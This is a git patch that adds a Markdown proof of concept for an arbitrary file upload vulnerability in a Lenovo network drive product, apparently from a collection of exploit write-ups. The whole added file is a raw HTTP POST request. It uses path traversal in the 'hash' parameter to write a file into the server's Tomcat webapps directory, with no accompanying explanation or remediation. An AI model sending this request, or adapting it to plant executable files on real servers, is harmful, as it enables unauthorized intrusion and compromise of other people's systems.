From a076dda9f5074f9f218941b1845e01a8f8b54235 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 21 Aug 2023 21:13:27 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=81=94=E6=83=B3=E7=BD=91=E7=9B=98?=
 =?UTF-8?q?=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A?=
 =?UTF-8?q?=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 联想网盘存在任意文件上传漏洞.md | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 联想网盘存在任意文件上传漏洞.md

diff --git a/联想网盘存在任意文件上传漏洞.md b/联想网盘存在任意文件上传漏洞.md
new file mode 100644
index 0000000..096e396
--- /dev/null
+++ b/联想网盘存在任意文件上传漏洞.md
@@ -0,0 +1,24 @@
+## 联想网盘存在任意文件上传漏洞
+```
+
+POST /write?neid=1&hash=../../../../../../../dragonball/srv/tomcat/webapps/stream_server/ttt.txt&status=1 HTTP/1.1
+Host:xxxx
+Cache-Control:max-age=0
+Sec-Ch-Ua:"Chromium";v="117", "Not;A=Brand";v="8"
+Sec-Ch-Ua-Mobile:?0
+Sec-Ch-Ua-Platform:"Windows"
+Upgrade-Insecure-Requests:1
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
+Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site:none
+Sec-Fetch-Mode:navigate
+Sec-Fetch-User:?1
+Sec-Fetch-Dest:document
+Accept-Language:zh-CN,zh;q=0.9
+Connection:close
+Content-Type:application/octet-stream
+Accept-Encoding:gzip, deflate
+Content-Length:8
+
+Testtest
+```